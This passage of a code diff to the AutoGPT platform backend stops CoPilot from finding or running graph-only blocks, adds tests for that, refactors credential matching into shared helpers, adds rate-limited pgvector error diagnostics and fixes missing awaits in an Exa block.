@@ -108,60 +130,90 @@ class FindBlockTool(BaseTool):
                block = get_block(block_id)

                # Skip disabled blocks
-                if block and not block.disabled:
-                    # Get input/output schemas
-                    input_schema = {}
-                    output_schema = {}
-                    try:
-                        input_schema = block.input_schema.jsonschema()
-                    except Exception:
-                        pass
-                    try:
-                        output_schema = block.output_schema.jsonschema()
-                    except Exception:
-                        pass
+                if not block or block.disabled:
+                    continue

-                    # Get categories from block instance
-                    categories = []
-                    if hasattr(block, "categories") and block.categories:
-                        categories = [cat.value for cat in block.categories]
+                # Skip blocks excluded from CoPilot (graph-only blocks)
+                if (
+                    block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
+                    or block.id in COPILOT_EXCLUDED_BLOCK_IDS
+                ):
+                    continue

-                    # Extract required inputs for easier use
-                    required_inputs: list[BlockInputFieldInfo] = []
-                    if input_schema:
-                        properties = input_schema.get("properties", {})
-                        required_fields = set(input_schema.get("required", []))
-                        # Get credential field names to exclude from required inputs
-                        credentials_fields = set(
-                            block.input_schema.get_credentials_fields().keys()
-                        )
-
-                        for field_name, field_schema in properties.items():
-                            # Skip credential fields - they're handled separately
-                            if field_name in credentials_fields:
-                                continue
-
-                            required_inputs.append(
-                                BlockInputFieldInfo(
-                                    name=field_name,
-                                    type=field_schema.get("type", "string"),
-                                    description=field_schema.get("description", ""),
-                                    required=field_name in required_fields,
-                                    default=field_schema.get("default"),
-                                )
-                            )
-
-                    blocks.append(
-                        BlockInfoSummary(
-                            id=block_id,
-                            name=block.name,
-                            description=block.description or "",
-                            categories=categories,
-                            input_schema=input_schema,
-                            output_schema=output_schema,
-                            required_inputs=required_inputs,
-                        )
+                # Get input/output schemas
+                input_schema = {}
+                output_schema = {}
+                try:
+                    input_schema = block.input_schema.jsonschema()
+                except Exception as e:
+                    logger.debug(
+                        "Failed to generate input schema for block %s: %s",
+                        block_id,
+                        e,
                    )
+                try:
+                    output_schema = block.output_schema.jsonschema()
+                except Exception as e:
+                    logger.debug(
+                        "Failed to generate output schema for block %s: %s",
+                        block_id,
+                        e,
+                    )
+
+                # Get categories from block instance
+                categories = []
+                if hasattr(block, "categories") and block.categories:
+                    categories = [cat.value for cat in block.categories]
+
+                # Extract required inputs for easier use
+                required_inputs: list[BlockInputFieldInfo] = []
+                if input_schema:
+                    properties = input_schema.get("properties", {})
+                    required_fields = set(input_schema.get("required", []))
+                    # Get credential field names to exclude from required inputs
+                    credentials_fields = set(
+                        block.input_schema.get_credentials_fields().keys()
+                    )
+
+                    for field_name, field_schema in properties.items():
+                        # Skip credential fields - they're handled separately
+                        if field_name in credentials_fields:
+                            continue
+
+                        required_inputs.append(
+                            BlockInputFieldInfo(
+                                name=field_name,
+                                type=field_schema.get("type", "string"),
+                                description=field_schema.get("description", ""),
+                                required=field_name in required_fields,
+                                default=field_schema.get("default"),
+                            )
+                        )
+
+                blocks.append(
+                    BlockInfoSummary(
+                        id=block_id,
+                        name=block.name,
+                        description=block.description or "",
+                        categories=categories,
+                        input_schema=input_schema,
+                        output_schema=output_schema,
+                        required_inputs=required_inputs,
+                    )
+                )
+
+                if len(blocks) >= _TARGET_RESULTS:
+                    break
+
+            if blocks and len(blocks) < _TARGET_RESULTS:
+                logger.debug(
+                    "find_block returned %d/%d results for query '%s' "
+                    "(filtered %d excluded/disabled blocks)",
+                    len(blocks),
+                    _TARGET_RESULTS,
+                    query,
+                    len(results) - len(blocks),
+                )

            if not blocks:
                return NoResultsResponse(
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
@@ -0,0 +1,139 @@
+"""Tests for block filtering in FindBlockTool."""
+
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from backend.api.features.chat.tools.find_block import (
+    COPILOT_EXCLUDED_BLOCK_IDS,
+    COPILOT_EXCLUDED_BLOCK_TYPES,
+    FindBlockTool,
+)
+from backend.api.features.chat.tools.models import BlockListResponse
+from backend.data.block import BlockType
+
+from ._test_data import make_session
+
+_TEST_USER_ID = "test-user-find-block"
+
+
+def make_mock_block(
+    block_id: str, name: str, block_type: BlockType, disabled: bool = False
+):
+    """Create a mock block for testing."""
+    mock = MagicMock()
+    mock.id = block_id
+    mock.name = name
+    mock.description = f"{name} description"
+    mock.block_type = block_type
+    mock.disabled = disabled
+    mock.input_schema = MagicMock()
+    mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
+    mock.input_schema.get_credentials_fields.return_value = {}
+    mock.output_schema = MagicMock()
+    mock.output_schema.jsonschema.return_value = {}
+    mock.categories = []
+    return mock
+
+
+class TestFindBlockFiltering:
+    """Tests for block filtering in FindBlockTool."""
+
+    def test_excluded_block_types_contains_expected_types(self):
+        """Verify COPILOT_EXCLUDED_BLOCK_TYPES contains all graph-only types."""
+        assert BlockType.INPUT in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.OUTPUT in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.WEBHOOK in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.WEBHOOK_MANUAL in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.NOTE in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.HUMAN_IN_THE_LOOP in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.AGENT in COPILOT_EXCLUDED_BLOCK_TYPES
+
+    def test_excluded_block_ids_contains_smart_decision_maker(self):
+        """Verify SmartDecisionMakerBlock is in COPILOT_EXCLUDED_BLOCK_IDS."""
+        assert "3b191d9f-356f-482d-8238-ba04b6d18381" in COPILOT_EXCLUDED_BLOCK_IDS
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_type_filtered_from_results(self):
+        """Verify blocks with excluded BlockTypes are filtered from search results."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        # Mock search returns an INPUT block (excluded) and a STANDARD block (included)
+        search_results = [
+            {"content_id": "input-block-id", "score": 0.9},
+            {"content_id": "standard-block-id", "score": 0.8},
+        ]
+
+        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
+        standard_block = make_mock_block(
+            "standard-block-id", "HTTP Request", BlockType.STANDARD
+        )
+
+        def mock_get_block(block_id):
+            return {
+                "input-block-id": input_block,
+                "standard-block-id": standard_block,
+            }.get(block_id)
+
+        with patch(
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
+            new_callable=AsyncMock,
+            return_value=(search_results, 2),
+        ):
+            with patch(
+                "backend.api.features.chat.tools.find_block.get_block",
+                side_effect=mock_get_block,
+            ):
+                tool = FindBlockTool()
+                response = await tool._execute(
+                    user_id=_TEST_USER_ID, session=session, query="test"
+                )
+
+        # Should only return the standard block, not the INPUT block
+        assert isinstance(response, BlockListResponse)
+        assert len(response.blocks) == 1
+        assert response.blocks[0].id == "standard-block-id"
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_id_filtered_from_results(self):
+        """Verify SmartDecisionMakerBlock is filtered from search results."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
+        search_results = [
+            {"content_id": smart_decision_id, "score": 0.9},
+            {"content_id": "normal-block-id", "score": 0.8},
+        ]
+
+        # SmartDecisionMakerBlock has STANDARD type but is excluded by ID
+        smart_block = make_mock_block(
+            smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
+        )
+        normal_block = make_mock_block(
+            "normal-block-id", "Normal Block", BlockType.STANDARD
+        )
+
+        def mock_get_block(block_id):
+            return {
+                smart_decision_id: smart_block,
+                "normal-block-id": normal_block,
+            }.get(block_id)
+
+        with patch(
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
+            new_callable=AsyncMock,
+            return_value=(search_results, 2),
+        ):
+            with patch(
+                "backend.api.features.chat.tools.find_block.get_block",
+                side_effect=mock_get_block,
+            ):
+                tool = FindBlockTool()
+                response = await tool._execute(
+                    user_id=_TEST_USER_ID, session=session, query="decision"
+                )
+
+        # Should only return normal block, not SmartDecisionMakerBlock
+        assert isinstance(response, BlockListResponse)
+        assert len(response.blocks) == 1
+        assert response.blocks[0].id == "normal-block-id"
--- a/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
@@ -0,0 +1,29 @@
+"""Shared helpers for chat tools."""
+
+from typing import Any
+
+
+def get_inputs_from_schema(
+    input_schema: dict[str, Any],
+    exclude_fields: set[str] | None = None,
+) -> list[dict[str, Any]]:
+    """Extract input field info from JSON schema."""
+    if not isinstance(input_schema, dict):
+        return []
+
+    exclude = exclude_fields or set()
+    properties = input_schema.get("properties", {})
+    required = set(input_schema.get("required", []))
+
+    return [
+        {
+            "name": name,
+            "title": schema.get("title", name),
+            "type": schema.get("type", "string"),
+            "description": schema.get("description", ""),
+            "required": name in required,
+            "default": schema.get("default"),
+        }
+        for name, schema in properties.items()
+        if name not in exclude
+    ]
--- a/autogpt_platform/backend/backend/api/features/chat/tools/models.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/models.py
@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
    name: str
    description: str
    categories: list[str]
-    input_schema: dict[str, Any]
-    output_schema: dict[str, Any]
+    input_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block inputs",
+    )
+    output_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block outputs",
+    )
    required_inputs: list[BlockInputFieldInfo] = Field(
        default_factory=list,
-        description="List of required input fields for this block",
+        description="List of input fields for this block",
    )


@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
    query: str
    usage_hint: str = Field(
        default="To execute a block, call run_block with block_id set to the block's "
-        "'id' field and input_data containing the required fields from input_schema."
+        "'id' field and input_data containing the fields listed in required_inputs."
    )


--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
@@ -24,6 +24,7 @@ from backend.util.timezone_utils import (
 )

 from .base import BaseTool
+from .helpers import get_inputs_from_schema
 from .models import (
    AgentDetails,
    AgentDetailsResponse,
@@ -261,7 +262,7 @@ class RunAgentTool(BaseTool):
                        ),
                        requirements={
                            "credentials": requirements_creds_list,
-                            "inputs": self._get_inputs_list(graph.input_schema),
+                            "inputs": get_inputs_from_schema(graph.input_schema),
                            "execution_modes": self._get_execution_modes(graph),
                        },
                    ),
@@ -369,22 +370,6 @@ class RunAgentTool(BaseTool):
                session_id=session_id,
            )

-    def _get_inputs_list(self, input_schema: dict[str, Any]) -> list[dict[str, Any]]:
-        """Extract inputs list from schema."""
-        inputs_list = []
-        if isinstance(input_schema, dict) and "properties" in input_schema:
-            for field_name, field_schema in input_schema["properties"].items():
-                inputs_list.append(
-                    {
-                        "name": field_name,
-                        "title": field_schema.get("title", field_name),
-                        "type": field_schema.get("type", "string"),
-                        "description": field_schema.get("description", ""),
-                        "required": field_name in input_schema.get("required", []),
-                    }
-                )
-        return inputs_list
-
    def _get_execution_modes(self, graph: GraphModel) -> list[str]:
        """Get available execution modes for the graph."""
        trigger_info = graph.trigger_setup_info
@@ -398,7 +383,7 @@ class RunAgentTool(BaseTool):
        suffix: str,
    ) -> str:
        """Build a message describing available inputs for an agent."""
-        inputs_list = self._get_inputs_list(graph.input_schema)
+        inputs_list = get_inputs_from_schema(graph.input_schema)
        required_names = [i["name"] for i in inputs_list if i["required"]]
        optional_names = [i["name"] for i in inputs_list if not i["required"]]

--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
@@ -8,14 +8,19 @@ from typing import Any
 from pydantic_core import PydanticUndefined

 from backend.api.features.chat.model import ChatSession
-from backend.data.block import get_block
+from backend.api.features.chat.tools.find_block import (
+    COPILOT_EXCLUDED_BLOCK_IDS,
+    COPILOT_EXCLUDED_BLOCK_TYPES,
+)
+from backend.data.block import AnyBlockSchema, get_block
 from backend.data.execution import ExecutionContext
-from backend.data.model import CredentialsMetaInput
+from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
 from backend.data.workspace import get_or_create_workspace
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.util.exceptions import BlockError

 from .base import BaseTool
+from .helpers import get_inputs_from_schema
 from .models import (
    BlockOutputResponse,
    ErrorResponse,
@@ -24,7 +29,10 @@ from .models import (
    ToolResponseBase,
    UserReadiness,
 )
-from .utils import build_missing_credentials_from_field_info
+from .utils import (
+    build_missing_credentials_from_field_info,
+    match_credentials_to_requirements,
+)

 logger = logging.getLogger(__name__)

@@ -73,91 +81,6 @@ class RunBlockTool(BaseTool):
    def requires_auth(self) -> bool:
        return True

-    async def _check_block_credentials(
-        self,
-        user_id: str,
-        block: Any,
-        input_data: dict[str, Any] | None = None,
-    ) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
-        """
-        Check if user has required credentials for a block.
-
-        Args:
-            user_id: User ID
-            block: Block to check credentials for
-            input_data: Input data for the block (used to determine provider via discriminator)
-
-        Returns:
-            tuple[matched_credentials, missing_credentials]
-        """
-        matched_credentials: dict[str, CredentialsMetaInput] = {}
-        missing_credentials: list[CredentialsMetaInput] = []
-        input_data = input_data or {}
-
-        # Get credential field info from block's input schema
-        credentials_fields_info = block.input_schema.get_credentials_fields_info()
-
-        if not credentials_fields_info:
-            return matched_credentials, missing_credentials
-
-        # Get user's available credentials
-        creds_manager = IntegrationCredentialsManager()
-        available_creds = await creds_manager.store.get_all_creds(user_id)
-
-        for field_name, field_info in credentials_fields_info.items():
-            effective_field_info = field_info
-            if field_info.discriminator and field_info.discriminator_mapping:
-                # Get discriminator from input, falling back to schema default
-                discriminator_value = input_data.get(field_info.discriminator)
-                if discriminator_value is None:
-                    field = block.input_schema.model_fields.get(
-                        field_info.discriminator
-                    )
-                    if field and field.default is not PydanticUndefined:
-                        discriminator_value = field.default
-
-                if (
-                    discriminator_value
-                    and discriminator_value in field_info.discriminator_mapping
-                ):
-                    effective_field_info = field_info.discriminate(discriminator_value)
-                    logger.debug(
-                        f"Discriminated provider for {field_name}: "
-                        f"{discriminator_value} -> {effective_field_info.provider}"
-                    )
-
-            matching_cred = next(
-                (
-                    cred
-                    for cred in available_creds
-                    if cred.provider in effective_field_info.provider
-                    and cred.type in effective_field_info.supported_types
-                ),
-                None,
-            )
-
-            if matching_cred:
-                matched_credentials[field_name] = CredentialsMetaInput(
-                    id=matching_cred.id,
-                    provider=matching_cred.provider,  # type: ignore
-                    type=matching_cred.type,
-                    title=matching_cred.title,
-                )
-            else:
-                # Create a placeholder for the missing credential
-                provider = next(iter(effective_field_info.provider), "unknown")
-                cred_type = next(iter(effective_field_info.supported_types), "api_key")
-                missing_credentials.append(
-                    CredentialsMetaInput(
-                        id=field_name,
-                        provider=provider,  # type: ignore
-                        type=cred_type,  # type: ignore
-                        title=field_name.replace("_", " ").title(),
-                    )
-                )
-
-        return matched_credentials, missing_credentials
-
    async def _execute(
        self,
        user_id: str | None,
@@ -212,11 +135,24 @@ class RunBlockTool(BaseTool):
                session_id=session_id,
            )

+        # Check if block is excluded from CoPilot (graph-only blocks)
+        if (
+            block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
+            or block.id in COPILOT_EXCLUDED_BLOCK_IDS
+        ):
+            return ErrorResponse(
+                message=(
+                    f"Block '{block.name}' cannot be run directly in CoPilot. "
+                    "This block is designed for use within graphs only."
+                ),
+                session_id=session_id,
+            )
+
        logger.info(f"Executing block {block.name} ({block_id}) for user {user_id}")

        creds_manager = IntegrationCredentialsManager()
-        matched_credentials, missing_credentials = await self._check_block_credentials(
-            user_id, block, input_data
+        matched_credentials, missing_credentials = (
+            await self._resolve_block_credentials(user_id, block, input_data)
        )

        if missing_credentials:
@@ -345,29 +281,75 @@ class RunBlockTool(BaseTool):
                session_id=session_id,
            )

-    def _get_inputs_list(self, block: Any) -> list[dict[str, Any]]:
+    async def _resolve_block_credentials(
+        self,
+        user_id: str,
+        block: AnyBlockSchema,
+        input_data: dict[str, Any] | None = None,
+    ) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
+        """
+        Resolve credentials for a block by matching user's available credentials.
+
+        Args:
+            user_id: ID of the user whose stored credentials are matched
+            block: Block to resolve credentials for
+            input_data: Input data for the block (used to determine provider via discriminator)
+
+        Returns:
+            tuple of (matched_credentials, missing_credentials) - matched credentials
+            are used for block execution, missing ones indicate setup requirements.
+        """
+        input_data = input_data or {}  # None is treated as "no inputs supplied"
+        requirements = self._resolve_discriminated_credentials(block, input_data)
+
+        if not requirements:
+            return {}, []  # no credential requirements: nothing matched or missing
+
+        return await match_credentials_to_requirements(user_id, requirements)
+
+    def _get_inputs_list(self, block: AnyBlockSchema) -> list[dict[str, Any]]:
        """Extract non-credential inputs from block schema."""
-        inputs_list = []
        schema = block.input_schema.jsonschema()
-        properties = schema.get("properties", {})
-        required_fields = set(schema.get("required", []))
-
-        # Get credential field names to exclude
        credentials_fields = set(block.input_schema.get_credentials_fields().keys())
+        return get_inputs_from_schema(schema, exclude_fields=credentials_fields)

-        for field_name, field_schema in properties.items():
-            # Skip credential fields
-            if field_name in credentials_fields:
-                continue
+    def _resolve_discriminated_credentials(
+        self,
+        block: AnyBlockSchema,
+        input_data: dict[str, Any],
+    ) -> dict[str, CredentialsFieldInfo]:
+        """Resolve credential requirements, applying discriminator logic where needed."""
+        credentials_fields_info = block.input_schema.get_credentials_fields_info()
+        if not credentials_fields_info:
+            return {}

-            inputs_list.append(
-                {
-                    "name": field_name,
-                    "title": field_schema.get("title", field_name),
-                    "type": field_schema.get("type", "string"),
-                    "description": field_schema.get("description", ""),
-                    "required": field_name in required_fields,
-                }
-            )
+        resolved: dict[str, CredentialsFieldInfo] = {}

-        return inputs_list
+        for field_name, field_info in credentials_fields_info.items():
+            effective_field_info = field_info
+
+            if field_info.discriminator and field_info.discriminator_mapping:
+                discriminator_value = input_data.get(field_info.discriminator)
+                if discriminator_value is None:
+                    field = block.input_schema.model_fields.get(
+                        field_info.discriminator
+                    )
+                    if field and field.default is not PydanticUndefined:
+                        discriminator_value = field.default
+
+                if (
+                    discriminator_value
+                    and discriminator_value in field_info.discriminator_mapping
+                ):
+                    effective_field_info = field_info.discriminate(discriminator_value)
+                    # For host-scoped credentials, add the discriminator value
+                    # (e.g., URL) so _credential_is_for_host can match it
+                    effective_field_info.discriminator_values.add(discriminator_value)
+                    logger.debug(
+                        f"Discriminated provider for {field_name}: "
+                        f"{discriminator_value} -> {effective_field_info.provider}"
+                    )
+
+            resolved[field_name] = effective_field_info
+
+        return resolved
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
@@ -0,0 +1,106 @@
+"""Tests for block execution guards in RunBlockTool."""
+
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from backend.api.features.chat.tools.models import ErrorResponse
+from backend.api.features.chat.tools.run_block import RunBlockTool
+from backend.data.block import BlockType
+
+from ._test_data import make_session
+
+_TEST_USER_ID = "test-user-run-block"
+
+
+def make_mock_block(
+    block_id: str, name: str, block_type: BlockType, disabled: bool = False
+):
+    """Build a MagicMock block with an empty input schema and no credential fields."""
+    mock = MagicMock()
+    mock.id = block_id
+    mock.name = name
+    mock.block_type = block_type
+    mock.disabled = disabled
+    mock.input_schema = MagicMock()
+    mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
+    mock.input_schema.get_credentials_fields_info.return_value = {}  # dict, not list
+    return mock
+
+
+class TestRunBlockFiltering:
+    """Exclusion-guard tests: RunBlockTool._execute rejects CoPilot-excluded blocks."""
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_type_returns_error(self):
+        """Attempting to execute a block with excluded BlockType returns error."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=input_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
+                block_id="input-block-id",
+                input_data={},
+            )
+
+        assert isinstance(response, ErrorResponse)
+        assert "cannot be run directly in CoPilot" in response.message
+        assert "designed for use within graphs only" in response.message
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_id_returns_error(self):
+        """Executing SmartDecisionMakerBlock, expected to be excluded by block ID, errors."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
+        smart_block = make_mock_block(
+            smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
+        )
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=smart_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
+                block_id=smart_decision_id,
+                input_data={},
+            )
+
+        assert isinstance(response, ErrorResponse)
+        assert "cannot be run directly in CoPilot" in response.message
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_non_excluded_block_passes_guard(self):
+        """Non-excluded blocks pass the filtering guard (may fail later for other reasons)."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        standard_block = make_mock_block(
+            "standard-id", "HTTP Request", BlockType.STANDARD
+        )
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=standard_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
+                block_id="standard-id",
+                input_data={},
+            )
+
+        # Should NOT be an ErrorResponse about CoPilot exclusion
+        # (may be other errors like missing credentials, but not the exclusion guard)
+        if isinstance(response, ErrorResponse):  # any other response type passes as-is
+            assert "cannot be run directly in CoPilot" not in response.message
--- a/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
@@ -8,6 +8,7 @@ from backend.api.features.library import model as library_model
 from backend.api.features.store import db as store_db
 from backend.data.graph import GraphModel
 from backend.data.model import (
+    Credentials,
    CredentialsFieldInfo,
    CredentialsMetaInput,
    HostScopedCredentials,
@@ -223,6 +224,99 @@ async def get_or_create_library_agent(
    return library_agents[0]


+async def match_credentials_to_requirements(
+    user_id: str,
+    requirements: dict[str, CredentialsFieldInfo],
+) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
+    """
+    Match user's credentials against a dictionary of credential requirements.
+
+    Core matching logic shared by graph and block matching; returns (matched, missing).
+    """
+    matched: dict[str, CredentialsMetaInput] = {}
+    missing: list[CredentialsMetaInput] = []
+
+    if not requirements:
+        return matched, missing  # nothing required: skip the credential lookup
+
+    available_creds = await get_user_credentials(user_id)
+
+    for field_name, field_info in requirements.items():
+        matching_cred = find_matching_credential(available_creds, field_info)
+
+        if matching_cred:
+            try:
+                matched[field_name] = create_credential_meta_from_match(matching_cred)
+            except Exception as e:  # building the meta failed: report as missing
+                logger.error(
+                    f"Failed to create CredentialsMetaInput for field '{field_name}': "
+                    f"provider={matching_cred.provider}, type={matching_cred.type}, "
+                    f"credential_id={matching_cred.id}",
+                    exc_info=True,
+                )
+                provider = next(iter(field_info.provider), "unknown")
+                cred_type = next(iter(field_info.supported_types), "api_key")
+                missing.append(
+                    CredentialsMetaInput(
+                        id=field_name,
+                        provider=provider,  # type: ignore
+                        type=cred_type,  # type: ignore
+                        title=f"{field_name} (validation failed: {e})",
+                    )
+                )
+        else:  # no stored credential satisfies this field
+            provider = next(iter(field_info.provider), "unknown")
+            cred_type = next(iter(field_info.supported_types), "api_key")
+            missing.append(
+                CredentialsMetaInput(
+                    id=field_name,
+                    provider=provider,  # type: ignore
+                    type=cred_type,  # type: ignore
+                    title=field_name.replace("_", " ").title(),
+                )
+            )
+
+    return matched, missing
+
+
+async def get_user_credentials(user_id: str) -> list[Credentials]:
+    """Return every credential the integration credentials store holds for user_id."""
+    creds_manager = IntegrationCredentialsManager()
+    return await creds_manager.store.get_all_creds(user_id)
+
+
+def find_matching_credential(
+    available_creds: list[Credentials],
+    field_info: CredentialsFieldInfo,
+) -> Credentials | None:
+    """Return the first credential matching provider, type, scopes and host, or None."""
+    for cred in available_creds:
+        if cred.provider not in field_info.provider:
+            continue  # provider not accepted by this field
+        if cred.type not in field_info.supported_types:
+            continue  # credential type not supported by this field
+        if cred.type == "oauth2" and not _credential_has_required_scopes(
+            cred, field_info
+        ):
+            continue  # OAuth2 credential does not cover the required scopes
+        if cred.type == "host_scoped" and not _credential_is_for_host(cred, field_info):
+            continue  # host-scoped credential failed the host check
+        return cred  # first credential passing every check wins
+    return None
+
+
+def create_credential_meta_from_match(
+    matching_cred: Credentials,
+) -> CredentialsMetaInput:
+    """Build a CredentialsMetaInput from a matched credential's identifying fields."""
+    return CredentialsMetaInput(
+        id=matching_cred.id,
+        provider=matching_cred.provider,  # type: ignore
+        type=matching_cred.type,
+        title=matching_cred.title,
+    )
+
+
 async def match_user_credentials_to_graph(
    user_id: str,
    graph: GraphModel,
@@ -331,8 +425,6 @@ def _credential_has_required_scopes(
    # If no scopes are required, any credential matches
    if not requirements.required_scopes:
        return True
-
-    # Check that credential scopes are a superset of required scopes
    return set(credential.scopes).issuperset(requirements.required_scopes)


--- a/autogpt_platform/backend/backend/api/features/store/hybrid_search.py
+++ b/autogpt_platform/backend/backend/api/features/store/hybrid_search.py
@@ -8,6 +8,7 @@ Includes BM25 reranking for improved lexical relevance.

 import logging
 import re
+import time
 from dataclasses import dataclass
 from typing import Any, Literal

@@ -362,7 +363,11 @@ async def unified_hybrid_search(
        LIMIT {limit_param} OFFSET {offset_param}
    """

-    results = await query_raw_with_schema(sql_query, *params)
+    try:
+        results = await query_raw_with_schema(sql_query, *params)
+    except Exception as e:
+        await _log_vector_error_diagnostics(e)
+        raise

    total = results[0]["total_count"] if results else 0
    # Apply BM25 reranking
@@ -686,7 +691,11 @@ async def hybrid_search(
        LIMIT {limit_param} OFFSET {offset_param}
    """

-    results = await query_raw_with_schema(sql_query, *params)
+    try:
+        results = await query_raw_with_schema(sql_query, *params)
+    except Exception as e:
+        await _log_vector_error_diagnostics(e)
+        raise

    total = results[0]["total_count"] if results else 0

@@ -718,6 +727,87 @@ async def hybrid_search_simple(
    return await hybrid_search(query=query, page=page, page_size=page_size)


+# ============================================================================
+# Diagnostics
+# ============================================================================
+
+# Rate limit: only log vector error diagnostics once per this interval
+_VECTOR_DIAG_INTERVAL_SECONDS = 60
+_last_vector_diag_time: float = 0
+
+
+async def _log_vector_error_diagnostics(error: Exception) -> None:
+    """Log diagnostic info when 'type vector does not exist' error occurs.
+
+    Note: Diagnostic queries use query_raw_with_schema which may run on a different
+    pooled connection than the one that failed. Session-level search_path can differ,
+    so results describe the connection that ran them, not necessarily the failed one.
+
+    Includes rate limiting to avoid log spam - only logs once per minute.
+    Caller should re-raise the error after calling this function.
+    """
+    global _last_vector_diag_time
+
+    # Check if this is the vector type error
+    error_str = str(error).lower()
+    if not (
+        "type" in error_str and "vector" in error_str and "does not exist" in error_str
+    ):
+        return
+
+    # Rate limit: only log once per interval
+    now = time.time()
+    if now - _last_vector_diag_time < _VECTOR_DIAG_INTERVAL_SECONDS:
+        return
+    _last_vector_diag_time = now  # recorded before running any diagnostic query
+
+    try:
+        diagnostics: dict[str, object] = {}
+
+        try:
+            search_path_result = await query_raw_with_schema("SHOW search_path")
+            diagnostics["search_path"] = search_path_result
+        except Exception as e:
+            diagnostics["search_path"] = f"Error: {e}"
+
+        try:
+            schema_result = await query_raw_with_schema("SELECT current_schema()")
+            diagnostics["current_schema"] = schema_result
+        except Exception as e:
+            diagnostics["current_schema"] = f"Error: {e}"
+
+        try:
+            user_result = await query_raw_with_schema(
+                "SELECT current_user, session_user, current_database()"
+            )
+            diagnostics["user_info"] = user_result
+        except Exception as e:
+            diagnostics["user_info"] = f"Error: {e}"
+
+        try:
+            # Check pgvector extension installation (per-database, stable info)
+            ext_result = await query_raw_with_schema(
+                "SELECT extname, extversion, nspname as schema "
+                "FROM pg_extension e "
+                "JOIN pg_namespace n ON e.extnamespace = n.oid "
+                "WHERE extname = 'vector'"
+            )
+            diagnostics["pgvector_extension"] = ext_result
+        except Exception as e:
+            diagnostics["pgvector_extension"] = f"Error: {e}"
+
+        logger.error(
+            f"Vector type error diagnostics:\n"
+            f"  Error: {error}\n"
+            f"  search_path: {diagnostics.get('search_path')}\n"
+            f"  current_schema: {diagnostics.get('current_schema')}\n"
+            f"  user_info: {diagnostics.get('user_info')}\n"
+            f"  pgvector_extension: {diagnostics.get('pgvector_extension')}"
+        )
+    except Exception as diag_error:
+        logger.error(f"Failed to collect vector error diagnostics: {diag_error}")
+
+
 # Backward compatibility alias - HybridSearchWeights maps to StoreAgentSearchWeights
 # for existing code that expects the popularity parameter
 HybridSearchWeights = StoreAgentSearchWeights
--- a/autogpt_platform/backend/backend/blocks/exa/websets.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets.py
@@ -478,7 +478,7 @@ class ExaCreateOrFindWebsetBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        try:
-            webset = aexa.websets.get(id=input_data.external_id)
+            webset = await aexa.websets.get(id=input_data.external_id)
            webset_result = Webset.model_validate(webset.model_dump(by_alias=True))

            yield "webset", webset_result
@@ -494,7 +494,7 @@ class ExaCreateOrFindWebsetBlock(Block):
                        count=input_data.search_count,
                    )

-                webset = aexa.websets.create(
+                webset = await aexa.websets.create(
